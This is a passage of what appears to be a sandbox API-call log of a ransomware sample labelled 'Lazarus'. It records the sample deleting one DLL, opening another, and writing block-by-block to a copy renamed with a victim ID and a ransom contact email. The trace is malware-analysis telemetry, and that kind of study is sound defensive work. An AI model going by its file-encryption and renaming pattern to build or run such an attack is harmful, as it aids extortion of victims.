lpWideCharStr=0x0) returned 38 [0080.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4c) returned 0x6d738 [0080.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x6d738, cchWideChar=38 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 38 [0080.277] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\SetupEngine.dll" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll")) returned 1 [0080.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0080.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0080.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0080.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0080.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0080.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0080.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0080.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0080.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d630 | out: hHeap=0x20000) returned 1 [0080.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0080.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0080.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bf40 | out: hHeap=0x20000) returned 1 [0080.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0080.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0080.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0080.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0080.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0080.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0080.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0080.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0080.279] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x48150, dwReserved0=0x1, dwReserved1=0x0, cFileName="SetupUi.dll", cAlternateFileName="")) returned 1 [0080.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0080.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0080.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0080.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0080.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0080.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0080.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0080.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0080.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0080.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0080.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0080.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0080.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0080.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0080.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0080.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0080.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0080.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0080.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0080.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0080.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0080.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0080.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0080.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0080.280] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0080.280] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0080.280] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0080.280] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0080.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0080.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0080.280] AreFileApisANSI () returned 1 [0080.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\SetupUi.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\SetupUi.dll", lpUsedDefaultChar=0x0) returned 34 [0080.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0080.280] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0080.280] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0080.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0080.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0080.281] AreFileApisANSI () returned 1 [0080.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0080.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x68d60 [0080.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=34 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupUi.dll") returned 34 [0080.281] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.dll" (normalized: "c:\\588bce7c90097ed212\\setupui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0080.281] GetFileType (hFile=0x42c) returned 0x1 [0080.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0080.281] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0080.281] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0080.282] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0080.282] CloseHandle (hObject=0x42c) returned 1 [0080.282] AreFileApisANSI () returned 1 [0080.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0080.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x69170 [0080.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x69170, cchWideChar=34 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupUi.dll") returned 34 [0080.282] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.dll" (normalized: "c:\\588bce7c90097ed212\\setupui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0080.282] GetFileType (hFile=0x42c) returned 0x1 [0080.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0080.282] CloseHandle (hObject=0x42c) returned 1 [0080.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0080.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0080.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0080.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0080.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0080.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0080.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0080.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0080.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0080.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0080.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0080.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0080.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0080.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0080.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0080.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0080.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0080.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0080.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0080.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0080.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0080.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0080.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0080.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0080.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0080.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0080.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0080.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0080.283] AreFileApisANSI () returned 1 [0080.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0080.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x68f40 [0080.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=34 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupUi.dll") returned 34 [0080.283] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\SetupUi.dll" (normalized: "c:\\588bce7c90097ed212\\setupui.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x48150)) returned 1 [0080.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0080.283] AreFileApisANSI () returned 1 [0080.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0080.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0080.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0080.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0080.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0080.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0080.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0080.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0080.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0080.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0080.284] GetLastError () returned 0x0 [0080.284] SetLastError (dwErrCode=0x0) [0080.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e228 [0080.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0080.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bf40 [0080.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0080.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d738 [0080.284] GetLastError () returned 0x0 [0080.284] SetLastError (dwErrCode=0x0) [0080.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0080.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0080.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x69170 [0080.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0080.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76200 [0080.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0080.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0080.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0080.284] AreFileApisANSI () returned 1 [0080.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0080.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x5a6b8 [0080.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=96 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupUi.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 96 [0080.285] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\setupui.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0080.285] GetFileType (hFile=0x42c) returned 0x1 [0080.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0080.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0080.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0080.286] AreFileApisANSI () returned 1 [0080.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0080.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x693f0 [0080.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x693f0, cchWideChar=34 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupUi.dll") returned 34 [0080.286] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.dll" (normalized: "c:\\588bce7c90097ed212\\setupui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0080.286] GetFileType (hFile=0x428) returned 0x1 [0080.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0080.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0080.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0080.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0080.286] GetLastError () returned 0x0 [0080.286] SetLastError (dwErrCode=0x0) [0080.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0080.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0080.286] GetLastError () returned 0x0 [0080.286] SetLastError (dwErrCode=0x0) [0080.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0080.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0080.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0080.286] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0080.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0080.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6c0 [0080.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0080.289] GetLastError () returned 0x0 [0080.289] SetLastError (dwErrCode=0x0) [0080.289] GetLastError () returned 0x0 [0080.289] SetLastError (dwErrCode=0x0) [0080.289] GetLastError () returned 0x0 [0080.289] SetLastError (dwErrCode=0x0) [0080.290] GetLastError () returned 0x0 [0080.290] SetLastError (dwErrCode=0x0) [0080.290] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.291] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.292] GetLastError () returned 0x0 [0080.292] SetLastError (dwErrCode=0x0) [0080.292] GetLastError () returned 0x0 [0080.292] SetLastError (dwErrCode=0x0) [0080.292] GetLastError () returned 0x0 [0080.292] SetLastError (dwErrCode=0x0) [0080.292] GetLastError () returned 0x0 [0080.292] SetLastError (dwErrCode=0x0) [0080.292] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.293] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.293] GetLastError () returned 0x0 [0080.293] SetLastError (dwErrCode=0x0) [0080.293] GetLastError () returned 0x0 [0080.293] SetLastError (dwErrCode=0x0) [0080.293] GetLastError () returned 0x0 [0080.293] SetLastError (dwErrCode=0x0) [0080.293] GetLastError () returned 0x0 [0080.293] SetLastError (dwErrCode=0x0) [0080.293] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.293] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.294] GetLastError () returned 0x0 [0080.294] SetLastError (dwErrCode=0x0) [0080.294] GetLastError () returned 0x0 [0080.294] SetLastError (dwErrCode=0x0) [0080.294] GetLastError () returned 0x0 [0080.294] SetLastError (dwErrCode=0x0) [0080.294] GetLastError () returned 0x0 [0080.294] SetLastError (dwErrCode=0x0) [0080.294] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.294] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.295] GetLastError () returned 0x0 [0080.295] SetLastError (dwErrCode=0x0) [0080.295] GetLastError () returned 0x0 [0080.295] SetLastError (dwErrCode=0x0) [0080.295] GetLastError () returned 0x0 [0080.295] SetLastError (dwErrCode=0x0) [0080.295] GetLastError () returned 0x0 [0080.295] SetLastError (dwErrCode=0x0) [0080.295] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.295] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.295] GetLastError () returned 0x0 [0080.295] SetLastError (dwErrCode=0x0) [0080.296] GetLastError () returned 0x0 [0080.296] SetLastError (dwErrCode=0x0) [0080.296] GetLastError () returned 0x0 [0080.296] SetLastError (dwErrCode=0x0) [0080.296] GetLastError () returned 0x0 [0080.296] SetLastError (dwErrCode=0x0) [0080.296] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.296] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.296] GetLastError () returned 0x0 [0080.296] SetLastError (dwErrCode=0x0) [0080.296] GetLastError () returned 0x0 [0080.296] SetLastError (dwErrCode=0x0) [0080.297] GetLastError () returned 0x0 [0080.297] SetLastError (dwErrCode=0x0) [0080.297] GetLastError () returned 0x0 [0080.297] SetLastError (dwErrCode=0x0) [0080.297] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: 